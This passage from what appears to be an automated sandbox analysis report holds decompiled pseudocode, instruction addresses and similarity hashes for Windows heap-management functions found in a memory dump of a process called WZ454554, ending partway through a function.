											E00ABB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_v16 + 0x10 + _t414);
										E00ABB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
										_t292 =  *[fs:0x30];
										_t421 = _t421 + 0xc;
										__eflags =  *((char*)(_t292 + 2));
										if( *((char*)(_t292 + 2)) != 0) {
											 *0xba6378 = 1;
											asm("int3");
											 *0xba6378 = 0;
										}
									}
								}
								goto L50;
							}
							_t296 = E00ADA229(_t307, _t414);
							__eflags = _t296;
							if(_t296 != 0) {
								goto L39;
							} else {
								L00ADA309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
								goto L50;
							}
						} else {
							_t373 =  *_t414 & 0x0000ffff;
							while(1) {
								__eflags = _t373 -  *((intOrPtr*)(_t407 + 4));
								if(_t373 <  *((intOrPtr*)(_t407 + 4))) {
									_t301 = _t373;
									break;
								}
								_t299 =  *_t407;
								__eflags = _t299;
								if(_t299 == 0) {
									_t301 =  *((intOrPtr*)(_t407 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t407 + 4)) - 1;
									break;
								} else {
									_t407 = _t299;
									continue;
								}
							}
							_t62 =  &(_t414[4]); // -16
							L00ADBC04(_t307, _t407, 1, _t62, _t301, _t373);
							goto L36;
						}
					}
					L11:
					_t402 = _t419[6];
					_t25 =  &(_t419[4]); // -16
					_t350 = _t25;
					_t254 =  *_t350;
					_v12 = _t254;
					_v20 = _t402;
					_t255 =  *((intOrPtr*)(_t254 + 4));
					__eflags =  *_t402 - _t255;
					if( *_t402 != _t255) {
						L61:
						_push(_t350);
						_push( *_t402);
						E00B7A80D(_t307, 0xd, _t350, _t255);
						goto L3;
					}
					__eflags =  *_t402 - _t350;
					if( *_t402 != _t350) {
						goto L61;
					}
					 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t419 & 0x0000ffff);
					_t404 =  *(_t307 + 0xb4);
					__eflags = _t404;
					if(_t404 == 0) {
						L20:
						_t352 = _v20;
						_t258 = _v12;
						 *_t352 = _t258;
						 *(_t258 + 4) = _t352;
						__eflags = _t419[1] & 0x00000008;
						if((_t419[1] & 0x00000008) != 0) {
							_t259 = E00ADA229(_t307, _t419);
							__eflags = _t259;
							if(_t259 != 0) {
								goto L21;
							} else {
								L00ADA309(_t307, _t419,  *_t419 & 0x0000ffff, 1);
								goto L3;
							}
						}
						L21:
						_t354 = _t419[1];
						__eflags = _t354 & 0x00000004;
						if((_t354 & 0x00000004) != 0) {
							_t415 = ( *_t419 & 0x0000ffff) * 8 - 0x10;
							__eflags = _t354 & 0x00000002;
							if((_t354 & 0x00000002) != 0) {
								__eflags = _t415 - 4;
								if(_t415 > 4) {
									_t415 = _t415 - 4;
									__eflags = _t415;
								}
							}
							_t91 =  &(_t419[8]); // -8
							_t262 = L00B0D540(_t91, _t415, 0xfeeefeee);
							_v20 = _t262;
							__eflags = _t262 - _t415;
							if(_t262 != _t415) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0xc);
								if( *(_t357 + 0xc) == 0) {
									_push("HEAP: ");
									E00ABB150();
								} else {
									E00ABB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_v20 + 0x10 + _t419);
								E00ABB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t419);
								_t271 =  *[fs:0x30];
								_t421 = _t421 + 0xc;
								__eflags =  *((char*)(_t271 + 2));
								if( *((char*)(_t271 + 2)) != 0) {
									 *0xba6378 = 1;
									asm("int3");
									 *0xba6378 = 0;
								}
							}
						}
						_t381 = _a4;
						_t414 = _t419;
						_t419[1] = 0;
						_t419[3] = 0;
						 *_t381 =  *_t381 + ( *_t419 & 0x0000ffff);
						 *_t419 =  *_t381;
						 *(_t419 + 4 +  *_t381 * 8) =  *_t381 ^  *(_t307 + 0x54);
						L4:
						_t420 = _t414 +  *_t381 * 8;
						if( *(_t307 + 0x4c) == 0) {
							L6:
							while((( *(_t307 + 0x4c) >> 0x00000014 &  *(_t307 + 0x52) ^ _t420[0]) & 0x00000001) == 0) {
								__eflags =  *(_t307 + 0x4c);
								if( *(_t307 + 0x4c) != 0) {
									_t390 =  *(_t307 + 0x50) ^  *_t420;
									 *_t420 = _t390;
									_t328 = _t390 >> 0x00000010 ^ _t390 >> 0x00000008 ^ _t390;
									__eflags = _t390 >> 0x18 - _t328;
									if(__eflags != 0) {
										_push(_t328);
										E00B6FA2B(_t307, _t307, _t420, _t414, _t420, __eflags);
									}
								}
								__eflags = _v5;
								if(_v5 == 0) {
									L94:
									_t382 = _t420[3];
									_t137 =  &(_t420[2]); // -16
									_t309 = _t137;
									_t186 =  *_t309;
									_v20 = _t186;
									_v16 = _t382;
									_t187 =  *((intOrPtr*)(_t186 + 4));
									__eflags =  *_t382 - _t187;
									if( *_t382 != _t187) {
										L63:
										_push(_t309);
										_push( *_t382);
										_push(_t187);
										_push(_t309);
										_push(0xd);
										L64:
										E00B7A80D(_t307);
										continue;
									}
									__eflags =  *_t382 - _t309;
									if( *_t382 != _t309) {
										goto L63;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t420 & 0x0000ffff);
									_t393 =  *(_t307 + 0xb4);
									__eflags = _t393;
									if(_t393 == 0) {
										L104:
										_t330 = _v16;
										_t190 = _v20;
										 *_t330 = _t190;
										 *(_t190 + 4) = _t330;
										__eflags = _t420[0] & 0x00000008;
										if((_t420[0] & 0x00000008) == 0) {
											L107:
											_t331 = _t420[0];
											__eflags = _t331 & 0x00000004;
											if((_t331 & 0x00000004) != 0) {
												_t196 = ( *_t420 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t196;
												__eflags = _t331 & 0x00000002;
												if((_t331 & 0x00000002) != 0) {
													__eflags = _t196 - 4;
													if(_t196 > 4) {
														_t196 = _t196 - 4;
														__eflags = _t196;
														_v12 = _t196;
													}
												}
												_t162 =  &(_t420[4]); // -8
												_t197 = L00B0D540(_t162, _t196, 0xfeeefeee);
												_v20 = _t197;
												__eflags = _t197 - _v12;
												if(_t197 != _v12) {
													_t335 =  *[fs:0x30];
													__eflags =  *(_t335 + 0xc);
													if( *(_t335 + 0xc) == 0) {
														_push("HEAP: ");
														E00ABB150();
													} else {
														E00ABB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t420);
													E00ABB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t420);
													_t203 =  *[fs:0x30];
													__eflags =  *((char*)(_t203 + 2));
													if( *((char*)(_t203 + 2)) != 0) {
														 *0xba6378 = 1;
														asm("int3");
														 *0xba6378 = 0;
													}
												}
											}
											_t394 = _a4;
											_t414[1] = 0;
											_t414[3] = 0;
											 *_t394 =  *_t394 + ( *_t420 & 0x0000ffff);
											 *_t414 =  *_t394;
											 *(_t414 + 4 +  *_t394 * 8) =  *_t394 ^  *(_t307 + 0x54);
											break;
										}
										_t207 = E00ADA229(_t307, _t420);
										__eflags = _t207;
										if(_t207 != 0) {
											goto L107;
										}
										L00ADA309(_t307, _t420,  *_t420 & 0x0000ffff, 1);
										continue;
									}
									_t342 =  *_t420 & 0x0000ffff;
									while(1) {
										__eflags = _t342 -  *((intOrPtr*)(_t393 + 4));
										if(_t342 <  *((intOrPtr*)(_t393 + 4))) {
											break;
										}
										_t210 =  *_t393;
										__eflags = _t210;
										if(_t210 == 0) {
											_t212 =  *((intOrPtr*)(_t393 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t393 + 4)) - 1;
											L103:
											_t146 =  &(_t420[2]); // -16
											L00ADBC04(_t307, _t393, 1, _t146, _t212, _t342);
											goto L104;
										}
										_t393 = _t210;
									}
									_t212 = _t342;
									goto L103;
								} else {
									_t384 = _t414[6];
									_t102 =  &(_t414[4]); // -16
									_t311 = _t102;
									_t215 =  *_t311;
									_v20 = _t215;
									_v16 = _t384;
									_t216 =  *((intOrPtr*)(_t215 + 4));
									__eflags =  *_t384 - _t216;
									if( *_t384 != _t216) {
										L92:
										_push(_t311);
										_push( *_t384);
										E00B7A80D(_t307, 0xd, _t311, _t216);
										L93:
										_v5 = 0;
										goto L94;
									}
									__eflags =  *_t384 - _t311;
									if( *_t384 != _t311) {
										goto L92;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
									_t386 =  *(_t307 + 0xb4);
									__eflags = _t386;
									if(_t386 == 0) {
										L79:
										_t313 = _v16;
										_t219 = _v20;
										 *_t313 = _t219;
										 *(_t219 + 4) = _t313;
										__eflags = _t414[1] & 0x00000008;
										if((_t414[1] & 0x00000008) == 0) {
											L82:
											_t314 = _t414[1];
											__eflags = _t314 & 0x00000004;
											if((_t314 & 0x00000004) != 0) {
												_t221 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t221;
												__eflags = _t314 & 0x00000002;
												if((_t314 & 0x00000002) != 0) {
													__eflags = _t221 - 4;
													if(_t221 > 4) {
														_t221 = _t221 - 4;
														__eflags = _t221;
														_v12 = _t221;
													}
												}
												_t127 =  &(_t414[8]); // -8
												_t222 = L00B0D540(_t127, _t221, 0xfeeefeee);
												_v20 = _t222;
												__eflags = _t222 - _v12;
												if(_t222 != _v12) {
													_t316 =  *[fs:0x30];
													__eflags =  *(_t316 + 0xc);
													if( *(_t316 + 0xc) == 0) {
														_push("HEAP: ");
														E00ABB150();
													} else {
														E00ABB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t414);
													E00ABB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
													_t228 =  *[fs:0x30];
													_t421 = _t421 + 0xc;
													__eflags =  *((char*)(_t228 + 2));
													if( *((char*)(_t228 + 2)) != 0) {
														 *0xba6378 = 1;
														asm("int3");
														 *0xba6378 = 0;
													}
												}
											}
											goto L93;
										}
										_t232 = E00ADA229(_t307, _t414);
										__eflags = _t232;
										if(_t232 != 0) {
											goto L82;
										}
										L00ADA309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
										goto L93;
									}
									_t323 =  *_t414 & 0x0000ffff;
									while(1) {
										__eflags = _t323 -  *((intOrPtr*)(_t386 + 4));
										if(_t323 <  *((intOrPtr*)(_t386 + 4))) {
											break;
										}
										_t235 =  *_t386;
										__eflags = _t235;
										if(_t235 == 0) {
											_t237 =  *((intOrPtr*)(_t386 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t386 + 4)) - 1;
											L78:
											_t111 =  &(_t414[4]); // -16
											L00ADBC04(_t307, _t386, 1, _t111, _t237, _t323);
											goto L79;
										}
										_t386 = _t235;
									}
									_t237 = _t323;
									goto L78;
								}
							}
							return _t414;
						}
						_t398 =  *(_t307 + 0x50) ^  *_t420;
						_t347 = _t398 >> 0x00000010 ^ _t398 >> 0x00000008 ^ _t398;
						if(_t398 >> 0x18 != _t347) {
							_push(_t347);
							_push(0);
							_push(0);
							_push(_t420);
							_push(3);
							goto L64;
						}
						goto L6;
					} else {
						_t277 =  *_t419 & 0x0000ffff;
						_v16 = _t277;
						while(1) {
							__eflags = _t277 -  *((intOrPtr*)(_t404 + 4));
							if(_t277 <  *((intOrPtr*)(_t404 + 4))) {
								break;
							}
							_t279 =  *_t404;
							__eflags = _t279;
							if(_t279 == 0) {
								_t277 =  *((intOrPtr*)(_t404 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t404 + 4)) - 1;
								break;
							} else {
								_t404 = _t279;
								_t277 =  *_t419 & 0x0000ffff;
								continue;
							}
						}
						L00ADBC04(_t307, _t404, 1, _t350, _t277, _v16);
						goto L20;
					}
				}
			}




















































































                            0x00ad99ca
                            0x00ad99cc
                            0x00ad99df
                            0x00ad99e3
                            0x00ad99f8
                            0x00ad99fb
                            0x00ad99fb
                            0x00000000
                            0x00ad9a48
                            0x00ad9a48
                            0x00ad9a4c
                            0x00ad9a51
                            0x00ad9a55
                            0x00ad9a61
                            0x00ad9a66
                            0x00ad9a68
                            0x00b21457
                            0x00b2145c
                            0x00b2145c
                            0x00ad9a68
                            0x00ad9a6e
                            0x00ad9a71
                            0x00ad9a74
                            0x00ad9a76
                            0x00b21466
                            0x00b21469
                            0x00b21469
                            0x00b2146c
                            0x00b2146e
                            0x00b21471
                            0x00b21474
                            0x00b21477
                            0x00b21479
                            0x00b2159c
                            0x00b2159c
                            0x00b2159d
                            0x00b215a6
                            0x00b215ab
                            0x00b215ab
                            0x00000000
                            0x00b215ab
                            0x00b2147f
                            0x00b21481
                            0x00000000
                            0x00000000
                            0x00b2148a
                            0x00b2148d
                            0x00b21493
                            0x00b21495
                            0x00b214c0
                            0x00b214c0
                            0x00b214c3
                            0x00b214c6
                            0x00b214c8
                            0x00b214cb
                            0x00b214cf
                            0x00b214f2
                            0x00b214f2
                            0x00b214f5
                            0x00b214f8
                            0x00b21501
                            0x00b21508
                            0x00b2150b
                            0x00b2150e
                            0x00b21510
                            0x00b21513
                            0x00b21515
                            0x00b21515
                            0x00b21518
                            0x00b21518
                            0x00b21513
                            0x00b21521
                            0x00b21525
                            0x00b2152a
                            0x00b2152d
                            0x00b21530
                            0x00b21532
                            0x00b21539
                            0x00b2153d
                            0x00b2155d
                            0x00b21562
                            0x00b2153f
                            0x00b21555
                            0x00b2155a
                            0x00b21570
                            0x00b21577
                            0x00b2157c
                            0x00b21582
                            0x00b21585
                            0x00b21589
                            0x00b2158b
                            0x00b21592
                            0x00b21593
                            0x00b21593
                            0x00b21589
                            0x00b21530
                            0x00000000
                            0x00b214f8
                            0x00b214d5
                            0x00b214da
                            0x00b214dc
                            0x00000000
                            0x00b214de
                            0x00b214e8
                            0x00000000
                            0x00b214e8
                            0x00b21497
                            0x00b21497
                            0x00b214a4
                            0x00b214a4
                            0x00b214a7
                            0x00b214a9
                            0x00b214ab
                            0x00b214ab
                            0x00b2149c
                            0x00b2149e
                            0x00b214a0
                            0x00b214b0
                            0x00b214b0
                            0x00000000
                            0x00b214a2
                            0x00b214a2
                            0x00000000
                            0x00b214a2
                            0x00b214a0
                            0x00b214b3
                            0x00b214bb
                            0x00000000
                            0x00b214bb
                            0x00b21495
                            0x00ad9a7c
                            0x00ad9a7c
                            0x00ad9a7f
                            0x00ad9a7f
                            0x00ad9a82
                            0x00ad9a84
                            0x00ad9a87
                            0x00ad9a8a
                            0x00ad9a8d
                            0x00ad9a8f
                            0x00b2166a
                            0x00b2166a
                            0x00b2166b
                            0x00b21674
                            0x00000000
                            0x00b21674
                            0x00ad9a95
                            0x00ad9a97
                            0x00000000
                            0x00000000
                            0x00ad9aa0
                            0x00ad9aa3
                            0x00ad9aa9
                            0x00ad9aab
                            0x00ad9ad7
                            0x00ad9ad7
                            0x00ad9ada
                            0x00ad9add
                            0x00ad9adf
                            0x00ad9ae2
                            0x00ad9ae6
                            0x00ad9b22
                            0x00ad9b27
                            0x00ad9b29
                            0x00000000
                            0x00ad9b2b
                            0x00b215be
                            0x00000000
                            0x00b215be
                            0x00ad9b29
                            0x00ad9ae8
                            0x00ad9ae8
                            0x00ad9aeb
                            0x00ad9aee
                            0x00b215cb
                            0x00b215d2
                            0x00b215d5
                            0x00b215d7
                            0x00b215da
                            0x00b215dc
                            0x00b215dc
                            0x00b215dc
                            0x00b215da
                            0x00b215e5
                            0x00b215e9
                            0x00b215ee
                            0x00b215f1
                            0x00b215f3
                            0x00b215f9
                            0x00b21600
                            0x00b21604
                            0x00b21624
                            0x00b21629
                            0x00b21606
                            0x00b2161c
                            0x00b21621
                            0x00b21637
                            0x00b2163e
                            0x00b21643
                            0x00b21649
                            0x00b2164c
                            0x00b21650
                            0x00b21656
                            0x00b2165d
                            0x00b2165e
                            0x00b2165e
                            0x00b21650
                            0x00b215f3
                            0x00ad9af4
                            0x00ad9af7
                            0x00ad9afc
                            0x00ad9b00
                            0x00ad9b04
                            0x00ad9b08
                            0x00ad9b14
                            0x00ad99fe
                            0x00ad9a04
                            0x00ad9a07
                            0x00000000
                            0x00ad9a29
                            0x00b2169c
                            0x00b216a0
                            0x00b216a5
                            0x00b216a9
                            0x00b216b5
                            0x00b216ba
                            0x00b216bc
                            0x00b216be
                            0x00b216c3
                            0x00b216c3
                            0x00b216bc
                            0x00b216c8
                            0x00b216cc
                            0x00b2181b
                            0x00b2181b
                            0x00b2181e
                            0x00b2181e
                            0x00b21821
                            0x00b21823
                            0x00b21826
                            0x00b21829
                            0x00b2182c
                            0x00b2182e
                            0x00b21688
                            0x00b21688
                            0x00b21689
                            0x00b2168b
                            0x00b2168c
                            0x00b2168d
                            0x00b2168f
                            0x00b21692
                            0x00000000
                            0x00b21692
                            0x00b21834
                            0x00b21836
                            0x00000000
                            0x00000000
                            0x00b2183f
                            0x00b21842
                            0x00b21848
                            0x00b2184a
                            0x00b21875
                            0x00b21875
                            0x00b21878
                            0x00b2187b
                            0x00b2187d
                            0x00b21880
                            0x00b21884
                            0x00b218a7
                            0x00b218a7
                            0x00b218aa
                            0x00b218ad
                            0x00b218b6
                            0x00b218bd
                            0x00b218c0
                            0x00b218c3
                            0x00b218c5
                            0x00b218c8
                            0x00b218ca
                            0x00b218ca
                            0x00b218cd
                            0x00b218cd
                            0x00b218c8
                            0x00b218d5
                            0x00b218da
                            0x00b218df
                            0x00b218e2
                            0x00b218e5
                            0x00b218e7
                            0x00b218ee
                            0x00b218f2
                            0x00b21912
                            0x00b21917
                            0x00b218f4
                            0x00b2190a
                            0x00b2190f
                            0x00b21925
                            0x00b2192c
                            0x00b21931
                            0x00b2193a
                            0x00b2193e
                            0x00b21940
                            0x00b21947
                            0x00b21948
                            0x00b21948
                            0x00b2193e
                            0x00b218e5
                            0x00b2194f
                            0x00b21952
                            0x00b21956
                            0x00b2195d
                            0x00b21961
                            0x00b2196d
                            0x00000000
                            0x00b2196d
                            0x00b2188a
                            0x00b2188f
                            0x00b21891
                            0x00000000
                            0x00000000
                            0x00b2189d
                            0x00000000
                            0x00b2189d
                            0x00b2184c
                            0x00b21859
                            0x00b21859
                            0x00b2185c
                            0x00000000
                            0x00000000
                            0x00b21851
                            0x00b21853
                            0x00b21855
                            0x00b21865
                            0x00b21865
                            0x00b21866
                            0x00b21868
                            0x00b21870
                            0x00000000
                            0x00b21870
                            0x00b21857
                            0x00b21857
                            0x00b2185e
                            0x00000000
                            0x00b216d2
                            0x00b216d2
                            0x00b216d5
                            0x00b216d5
                            0x00b216d8
                            0x00b216da
                            0x00b216dd
                            0x00b216e0
                            0x00b216e3
                            0x00b216e5
                            0x00b21808
                            0x00b21808
                            0x00b21809
                            0x00b21812
                            0x00b21817
                            0x00b21817
                            0x00000000
                            0x00b21817
                            0x00b216eb
                            0x00b216ed
                            0x00000000
                            0x00000000
                            0x00b216f6
                            0x00b216f9
                            0x00b216ff
                            0x00b21701
                            0x00b2172c
                            0x00b2172c
                            0x00b2172f
                            0x00b21732
                            0x00b21734
                            0x00b21737
                            0x00b2173b
                            0x00b2175e
                            0x00b2175e
                            0x00b21761
                            0x00b21764
                            0x00b2176d
                            0x00b21774
                            0x00b21777
                            0x00b2177a
                            0x00b2177c
                            0x00b2177f
                            0x00b21781
                            0x00b21781
                            0x00b21784
                            0x00b21784
                            0x00b2177f
                            0x00b2178c
                            0x00b21791
                            0x00b21796
                            0x00b21799
                            0x00b2179c
                            0x00b2179e
                            0x00b217a5
                            0x00b217a9
                            0x00b217c9
                            0x00b217ce
                            0x00b217ab
                            0x00b217c1
                            0x00b217c6
                            0x00b217dc
                            0x00b217e3
                            0x00b217e8
                            0x00b217ee
                            0x00b217f1
                            0x00b217f5
                            0x00b217f7
                            0x00b217fe
                            0x00b217ff
                            0x00b217ff
                            0x00b217f5
                            0x00b2179c
                            0x00000000
                            0x00b21764
                            0x00b21741
                            0x00b21746
                            0x00b21748
                            0x00000000
                            0x00000000
                            0x00b21754
                            0x00000000
                            0x00b21754
                            0x00b21703
                            0x00b21710
                            0x00b21710
                            0x00b21713
                            0x00000000
                            0x00000000
                            0x00b21708
                            0x00b2170a
                            0x00b2170c
                            0x00b2171c
                            0x00b2171c
                            0x00b2171d
                            0x00b2171f
                            0x00b21727
                            0x00000000
                            0x00b21727
                            0x00b2170e
                            0x00b2170e
                            0x00b21715
                            0x00000000
                            0x00b21715
                            0x00b216cc
                            0x00ad9a45
                            0x00ad9a45
                            0x00ad9a0e
                            0x00ad9a1c
                            0x00ad9a23
                            0x00b2167e
                            0x00b2167f
                            0x00b21681
                            0x00b21683
                            0x00b21684
                            0x00000000
                            0x00b21684
                            0x00000000
                            0x00ad9aad
                            0x00ad9aad
                            0x00ad9ab0
                            0x00ad9ab3
                            0x00ad9ab3
                            0x00ad9ab6
                            0x00000000
                            0x00000000
                            0x00ad9ab8
                            0x00ad9aba
                            0x00ad9abc
                            0x00ad9ac8
                            0x00ad9ac8
                            0x00000000
                            0x00ad9abe
                            0x00ad9abe
                            0x00ad9ac0
                            0x00000000
                            0x00ad9ac0
                            0x00ad9abc
                            0x00ad9ad2
                            0x00000000
                            0x00ad9ad2
                            0x00ad9aab

                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                            • API String ID: 0-3178619729
                            • Opcode ID: b9087b25103f6399a4280597dae9a591dec94b6ccd4f7e30e9b581511ba1807f
                            • Instruction ID: c8768e8c3854d8298e033cc1011ecfdd0adf56f91e80628ecfd63ff79b228b14
                            • Opcode Fuzzy Hash: b9087b25103f6399a4280597dae9a591dec94b6ccd4f7e30e9b581511ba1807f
                            • Instruction Fuzzy Hash: F72201706002519FDB24CF2CD895B7ABBF5EF54704F2489AAE84A8B392E775DC81CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00ADB8E4, Relevance: 3.8, Strings: 3, Instructions: 69COMMON
                            Download Yara Rule
                            C-Code - Quality: 60%
                            			E00ADB8E4(unsigned int __edx) {
				void* __ecx;
				void* __edi;
				intOrPtr* _t16;
				intOrPtr _t18;
				void* _t27;
				void* _t28;
				unsigned int _t30;
				intOrPtr* _t31;
				unsigned int _t38;
				void* _t39;
				unsigned int _t40;

				_t40 = __edx;
				_t39 = _t28;
				if( *0xba8748 >= 1) {
					__eflags = (__edx + 0x00000fff & 0xfffff000) - __edx;
					if((__edx + 0x00000fff & 0xfffff000) != __edx) {
						_t18 =  *[fs:0x30];
						__eflags =  *(_t18 + 0xc);
						if( *(_t18 + 0xc) == 0) {
							_push("HEAP: ");
							E00ABB150();
						} else {
							E00ABB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)");
						E00ABB150();
						__eflags =  *0xba7bc8;
						if(__eflags == 0) {
							E00B72073(_t27, 1, _t39, __eflags);
						}
					}
				}
				_t38 =  *(_t39 + 0xb8);
				if(_t38 != 0) {
					_t13 = _t40 >> 0xc;
					__eflags = _t13;
					while(1) {
						__eflags = _t13 -  *((intOrPtr*)(_t38 + 4));
						if(_t13 <  *((intOrPtr*)(_t38 + 4))) {
							break;
						}
						_t30 =  *_t38;
						__eflags = _t30;
						if(_t30 != 0) {
							_t38 = _t30;
							continue;
						}
						_t13 =  *((intOrPtr*)(_t38 + 4)) - 1;
						__eflags =  *((intOrPtr*)(_t38 + 4)) - 1;
						break;
					}
					return L00ADAB40(_t39, _t38, 0, _t13, _t40);
				} else {
					_t31 = _t39 + 0x8c;
					_t16 =  *_t31;
					while(_t31 != _t16) {
						__eflags =  *((intOrPtr*)(_t16 + 0x14)) - _t40;
						if( *((intOrPtr*)(_t16 + 0x14)) >= _t40) {
							return _t16;
						}
						_t16 =  *_t16;
					}
					return _t31;
				}
			}














                            0x00adb8f0
                            0x00adb8f2
                            0x00adb8f4
                            0x00b22c4e
                            0x00b22c50
                            0x00b22c56
                            0x00b22c5c
                            0x00b22c60
                            0x00b22c7f
                            0x00b22c84
                            0x00b22c62
                            0x00b22c77
                            0x00b22c7c
                            0x00b22c8a
                            0x00b22c8f
                            0x00b22c94
                            0x00b22c9c
                            0x00b22ca5
                            0x00b22ca5
                            0x00b22c9c
                            0x00b22c50
                            0x00adb8fa
                            0x00adb902
                            0x00adb921
                            0x00adb921
                            0x00adb924
                            0x00adb924
                            0x00adb927
                            0x00000000
                            0x00000000
                            0x00adb929
                            0x00adb92b
                            0x00adb92d
                            0x00adb940
                            0x00000000
                            0x00adb940
                            0x00adb932
                            0x00adb932
                            0x00000000
                            0x00adb932
                            0x00000000
                            0x00adb904
                            0x00adb904
                            0x00adb90a
                            0x00adb90c
                            0x00adb916
                            0x00adb919
                            0x00adb915
                            0x00adb915
                            0x00adb91b
                            0x00adb91b
                            0x00000000
                            0x00adb910

                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                            • API String ID: 0-2558761708
                            • Opcode ID: e88cbc4d5698f3a17714e23adcf785cd5397d6cc95c58f5bfcb5e2066a488647
                            • Instruction ID: 3e9e2efb20edde693fbdc40712334c631e1ab58dfddcaaafb352bcde9dad61a4
                            • Opcode Fuzzy Hash: e88cbc4d5698f3a17714e23adcf785cd5397d6cc95c58f5bfcb5e2066a488647
                            • Instruction Fuzzy Hash: FD11E131324141EFDB28D725D4A5B39B3A9EF40760F26816AE00BCB391DB70DC40D661
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00B351BE, Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                            Download Yara Rule
                            C-Code - Quality: 77%
                            			E00B351BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0xb905f0);
				E00B0D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					L00ACEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E00B353CA(0);
						return E00B0D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E00AFF3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = L00AD3690(1, _t117, 0xa91810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E00AFAA90();
